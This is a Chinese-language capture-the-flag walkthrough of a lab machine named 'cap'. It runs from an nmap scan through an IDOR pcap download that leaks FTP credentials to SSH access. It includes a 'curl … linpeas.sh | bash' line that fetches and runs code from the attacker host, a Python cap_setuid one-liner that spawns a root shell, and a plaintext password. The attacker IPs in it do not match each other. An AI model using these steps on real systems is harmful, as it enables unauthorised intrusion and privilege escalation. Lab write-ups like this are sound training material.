信息收集
端口扫描
使用 Nmap 对目标主机进行全端口扫描:
nmap -sC -sV -T4 -p- 10.129.2.34参数说明:
-sC:使用 Nmap 默认脚本进行扫描,相当于--script=default-sV:进行服务及版本探测,识别端口上运行的服务和版本信息-T4:设置扫描速度模板为 T4,速度较快,适合靶机环境-p-:扫描全部 TCP 端口,即 1-6553510.129.2.34:目标主机 IP 地址
小技巧:nmap扫描的时候按空格可以查看进度
好的,写到这里的时候,nmap已经扫描完毕。
┌──(kali㉿kali)-[~]└─$ nmap -sC -sV -T4 -p- 10.129.2.34Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-22 19:42 -0400Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 59.62% done; ETC: 19:44 (0:00:46 remaining)Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 59.90% done; ETC: 19:44 (0:00:46 remaining)Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 99.72% done; ETC: 19:47 (0:00:01 remaining)Nmap scan report for 10.129.2.34Host is up (0.14s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)80/tcp open http Gunicorn|_http-server-header: gunicorn|_http-title: Security DashboardService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 318.51 seconds目标的21端口是开启的,并且是ftp服务,我们可以尝试匿名登录。 22端口是ssh,版本较高,可能没有漏洞?先不考虑 80端口是http服务,我们可以尝试访问http://10.129.2.34,看有没有什么信息
尝试使用anonymous用户匿名登录ftp服务
┌──(kali㉿kali)-[~]└─$ ftp 10.129.2.34 21Connected to 10.129.2.34.220 (vsFTPd 3.0.3)Name (10.129.2.34:kali): anonymous331 Please specify the password.Password:530 Login incorrect.ftp: Login failedftp>失败了
GetShell
访问http://10.129.2.34/,随便看看,知道了可能存在一个Nathan用户
用dirsearch也没有发现有用的信息
┌──(kali㉿kali)-[~]└─$ dirsearch -u http://10.129.2.34/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25Wordlist size: 11460
Output File: /home/kali/reports/http_10.129.2.34/_26-05-22_20-00-47.txt
Target: http://10.129.2.34/
[20:00:47] Starting:[20:01:06] 302 - 208B - /data -> http://10.129.2.34/[20:01:06] 302 - 208B - /data/adminer.php -> http://10.129.2.34/[20:01:06] 302 - 208B - /data/autosuggest -> http://10.129.2.34/[20:01:07] 302 - 208B - /download/history.csv -> http://10.129.2.34/[20:01:07] 302 - 208B - /download/users.csv -> http://10.129.2.34/
Task Completed(这里我重置了机器,靶机ip从10.129.2.34变成10.129.2.41了)
发现Security Snapshot这里有一些数据可以下载。

尝试访问http://10.129.2.41/data/0,发现可以下载其他id的数据

用wireshark打开,发现有ftp的账号和密码

用户名是nathan,密码是Buck3tH4TF0RM3!
┌──(kali㉿kali)-[~]└─$ ftp 10.129.2.41 21Connected to 10.129.2.41.220 (vsFTPd 3.0.3)Name (10.129.2.41:kali): nathan331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls229 Entering Extended Passive Mode (|||48586|)150 Here comes the directory listing.-r-------- 1 1001 1001 33 May 23 01:38 user.txt226 Directory send OK.ftp> get user.txtlocal: user.txt remote: user.txt229 Entering Extended Passive Mode (|||16491|)150 Opening BINARY mode data connection for user.txt (33 bytes).100% |*************************************| 33 0.59 KiB/s 00:00 ETA226 Transfer complete.33 bytes received in 00:00 (0.10 KiB/s)ftp>退出ftp后cat一下就能得到user flag了。
ftp> quit221 Goodbye.
┌──(kali㉿kali)-[~]└─$ cat user.txt39c64bb9f36bb91f611e5356711b1067尝试使用ftp的用户名和密码登录ssh,成功了。顺手看一下靶机是什么操作系统,而且我们可以看见这台靶机是64位的(x86_64)
┌──(kali㉿kali)-[~]└─$ ssh [email protected]The authenticity of host '10.129.2.41 (10.129.2.41)' can't be established.ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUIThis key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.129.2.41' (ED25519) to the list of known hosts.** WARNING: connection is not using a post-quantum key exchange algorithm.** This session may be vulnerable to "store now, decrypt later" attacks.** The server may need to be upgraded. See https://openssh.com/pq.html[email protected]'s password: #注意,这个地方输入密码是不会显示的,输完之后回车就可以了
nathan@cap:~$ uname -aLinux cap 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux权限提升
接下来我们把linpeas传到目标机器上。
┌──(kali㉿kali)-[~]└─$ linpeas
> peass ~ Privilege Escalation Awesome Scripts SUITE
/usr/share/peass/linpeas├── linpeas_darwin_amd64├── linpeas_darwin_arm64├── linpeas_fat.sh├── linpeas_linux_386├── linpeas_linux_amd64├── linpeas_linux_arm├── linpeas_linux_arm64├── linpeas.sh└── linpeas_small.sh运行linpeas之后,我们的工作目录就来到了/usr/share/peass/linpeas文件夹下。这里有很多个版本的linpeas,仔细看会发现: darwin是苹果的系统,排除。 386的是给32位x86架构的,排除。 linpeas_linux_amd64,可以尝试。因为刚刚uname -a命令已经告诉我们靶机是x86-64的linux系统。但是我这里是失败了。 .sh后缀的是linux的脚本文件,我们待会用linpeas.sh
在我们的攻击机(kali)上:
┌──(kali㉿kali)-[/usr/share/peass/linpeas]└─$ ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:9e:7b:1f brd ff:ff:ff:ff:ff:ff inet 192.168.246.137/24 brd 192.168.246.255 scope global dynamic noprefixroute eth0 valid_lft 1548sec preferred_lft 1548sec inet6 fe80::b818:7cc9:920e:3d17/64 scope link noprefixroute valid_lft forever preferred_lft forever3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500 link/none inet 10.10.16.16/23 brd 10.10.17.255 scope global tun0 valid_lft forever preferred_lft forever inet6 dead:beef:4::100e/64 scope global valid_lft forever preferred_lft forever inet6 fe80::7e6f:ca02:a0dd:10db/64 scope link stable-privacy proto kernel_ll valid_lft forever preferred_lft forever使用ip a可以看见网络接口的信息,这里我们是要获取自己机器的ip。lo是本地回环接口,用于主机自己访问自己,地址通常是 127.0.0.1,eth0是本机的普通网络接口,用于连接本地网络/互联网,而tun0是VPN 创建的虚拟网卡,用于连接靶场内网。这里我的tun0网卡的ip是10.10.16.16
┌──(kali㉿kali)-[/usr/share/peass/linpeas]└─$ goshs -p 80WARNING[2026-05-22 21:59:55] There is a newer Version (v2.0.8) of goshs available. Run --update to update goshs. __ _ ___ ___| |__ ___ / _` |/ _ \/ __| '_ \/ __|| (_| | (_) \__ \ | | \__ \ \__, |\___/|___/_| |_|___/ __/ | |___/ v2.0.5
INFO [2026-05-22 21:59:55] Download embedded file at: /example.txt?embeddedINFO [2026-05-22 21:59:55] Serving on interface lo bound to 127.0.0.1:80INFO [2026-05-22 21:59:55] Serving on interface eth0 bound to 192.168.246.137:80goshs -p 80的作用是启动一个80端口的http文件服务器,方便我们在靶机通过wget下载文件(下载linpeas)Buck3tH4TF0RM3!
接下来在靶机上下载并执行linpeas
在靶机上:
nathan@cap:~$ curl http://10.10.14.24/linpeas.sh | bash发现/usr/bin/python3.8有cap_setuid权限。 CAP_SETUID 是 Linux 能力(Capabilities)中的一种,用于允许进程更改其用户 ID(UID)。在传统的 UNIX 系统中,只有超级用户(root)可以执行此类操作,而通过 CAP_SETUID,普通用户也可以在特定条件下更改进程的 UID,从而实现更细粒度的权限控制。
Files with capabilities (limited to 50):/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip/usr/bin/ping = cap_net_raw+ep/usr/bin/traceroute6.iputils = cap_net_raw+ep/usr/bin/mtr-packet = cap_net_raw+ep/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+epnathan@cap:/tmp$ /usr/bin/python3.8Python 3.8.5 (default, Jan 27 2021, 15:41:15)[GCC 9.3.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> import os>>> os.setuid(0)>>> os.system("/bin/bash")root@cap:/tmp# cd /rootroot@cap:/root# lsroot.txt snaproot@cap:/root# cat root.txt55d2a1c3bb39aae7c3e7396053329049この記事が役に立ったときは、ぜひ他の人に共有してください!
一部の情報は古い可能性があります






